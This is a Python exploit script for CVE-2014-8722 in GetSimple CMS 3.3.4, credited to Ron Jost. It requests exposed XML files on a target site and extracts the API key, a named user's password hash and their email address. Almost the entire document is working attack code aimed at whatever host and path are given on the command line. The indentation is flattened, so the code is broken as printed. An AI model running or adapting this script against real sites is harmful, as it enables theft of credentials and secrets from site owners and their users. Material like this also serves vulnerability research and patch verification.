# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit
'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/<username>.xml,
(2) backups/users/<username>.xml.bak,
(3) data/other/authorization.xml, or
(4) data/other/appid.xml.
'''
'''
Import required modules:
'''
import sys
import requests
'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath = sys.argv[3]
print('')
username = input("Do you know the username? Y/N: ")
if username == 'Y':
print('')
username = True
username_string = input('Please enter the username: ')
else:
print('')
username = False
print('No problem, you will still get the API key')
'''
Get Api-Key:
'''
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0"
}
x = requests.get(url, headers=header).text
start = x.find('[') + 7
end = x.find(']')
api_key = x[start:end]
print('')
print('Informations:')
print('')
print('[*] API Key: ' + api_key)
if username:
'''
Get Email and Passwordhash:
'''
url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0"
}
x = requests.get(url, headers=header).text
start = x[x.find('PWD>'):]
passwordhash = start[start.find('>') +1 :start.find('<')]
print('[*] Hashed Password: ' + passwordhash)
start = x[x.find('EMAIL>'):]
email = start[start.find('>') + 1 : start.find('<')]
print('[*] Email: ' + email)
print('')